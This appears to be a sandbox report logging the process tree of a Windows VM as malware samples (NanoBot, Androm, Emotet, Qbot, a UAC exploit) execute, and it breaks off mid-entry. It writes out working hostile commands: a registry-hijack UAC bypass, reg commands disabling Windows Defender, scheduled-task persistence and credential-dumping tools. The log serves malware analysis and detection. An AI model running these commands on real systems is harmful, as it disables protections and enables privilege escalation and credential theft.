"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=1344 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:4892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4180 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:2784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=4756 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:3012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6080 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:3076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5680 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:3212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6324 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:3812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6332 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:1796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6388 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:2556

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x384 0x48c
1⤵
PID:1228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6668 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:3084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=1300 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:4612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5380 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:4340

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Bazaar.2020.04.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2a8,0x7ffea3b92e98,0x7ffea3b92ea4,0x7ffea3b92eb0
  2⤵
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2252 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:2
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2972 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:3
  2⤵
  PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3096 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4288 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4288 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2328 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:3216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4592 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4648 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:4104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=780 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1008 --field-trial-handle=2256,i,11739057152592225629,13607667999443816792,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:3416

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "C:\Users\Admin\Desktop\InitializeUndo.dotm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1980

C:\Users\Admin\Desktop\Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
"C:\Users\Admin\Desktop\Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5036
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"
  2⤵
  PID:3760
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"
  2⤵
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:4240
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "SMTP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9187.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:2496
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn "SMTP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp931F.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:4068

C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe
"C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"
1⤵
- Executes dropped EXE
PID:1920
- C:\Users\Admin\AppData\Local\Temp\is-5U2SS.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-5U2SS.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp" /SL5="$70282,3872572,832512,C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4920
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\WindowsPowerShell\Configuration\errorfake.vbs"
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.uac.bat" "
    3⤵
    PID:1104
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
      4⤵
      Modifies registry class
      PID:568
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
      4⤵
      Modifies registry class
      PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.wdcloud.bat" "
    3⤵
    PID:3824
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:3412
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:4732
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:4520
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:3112
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:5112
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:4528
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1952
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2988
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:1940
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      4⤵
      PID:3456
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      4⤵
      PID:3516
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      4⤵
      PID:4308
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
    3⤵
    - Checks computer location settings
    PID:3000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\main.bat" "
      4⤵
      PID:744
    - - C:\Windows\SysWOW64\mode.com
        
        mode 65,10
        5⤵
        
        PID:384
    - - C:\ProgramData\7z.exe
        
        7z.exe e file.zip -p___________26681pwd226pwd25461___________ -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4352
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_11.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_10.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_9.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_8.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3424
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:712
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3488
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3908
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1168
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +H "MBSetup.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4944
    - - C:\ProgramData\MBSetup.exe
        
        "MBSetup.exe"
        5⤵
        Executes dropped EXE
        
        PID:4844
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1108
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
    3⤵
    - Checks computer location settings
    PID:2964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.delete.bat" "
      4⤵
      PID:1960
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 60 127.1
        5⤵
        Runs ping.exe
        
        PID:3528
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:3888
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del 7z.dll"
        5⤵
        
        PID:4936
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4640
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del 7z.exe"
        5⤵
        
        PID:4652
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:3284
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del main.bat"
        5⤵
        
        PID:4332
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:5016
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del file.bin"
        5⤵
        
        PID:2372
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:1432
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.run.vbs"
        5⤵
        
        PID:4300
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4420
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.2run.vbs"
        5⤵
        
        PID:820
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:1684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.uac.bat"
        5⤵
        
        PID:4020
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:3120
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.wdcloud.bat"
        5⤵
        
        PID:3952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2628
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.delete.bat"
        5⤵
        
        PID:1272

C:\Users\Admin\Desktop\Exploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exe
"C:\Users\Admin\Desktop\Exploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exe"
1⤵
- Executes dropped EXE
PID:1128

C:\Users\Admin\Desktop\HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
"C:\Users\Admin\Desktop\HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3948
- C:\Users\Admin\Desktop\HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
  "{path}"
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:3172

C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe
"C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2968
- C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe
  "C:\Users\Admin\Desktop\HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  PID:2008
- - C:\Users\Admin\AppData\Local\Temp\GetBP.exe
    C:\Users\Admin\AppData\Local\Temp\GetBP.exe -f C:\Users\Admin\AppData\Local\Temp\QM00013-Browserpassfile.txt
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:744
- - C:\Users\Admin\AppData\Local\Temp\EmailPasswordDump.exe
    C:\Users\Admin\AppData\Local\Temp\EmailPasswordDump.exe -f C:\Users\Admin\AppData\Local\Temp\QM00013-Emailpassfile.txt
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook accounts
    - Suspicious use of AdjustPrivilegeToken
    PID:2328
- - C:\Users\Admin\AppData\Local\Temp\FTPPasswordDump.exe
    C:\Users\Admin\AppData\Local\Temp\FTPPasswordDump.exe -f C:\Users\Admin\AppData\Local\Temp\QM00013-FTPpassfile.txt
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4964

C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe
"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3500

C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exe
"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exe"
1⤵
- Executes dropped EXE
PID:4016

C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe
"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe"
1⤵
- Executes dropped EXE
PID:1868
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 636
  2⤵
  - Program crash
  PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1868 -ip 1868
1⤵
PID:1384

C:\Users\Admin\Desktop\HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe
"C:\Users\Admin\Desktop\HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1940
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
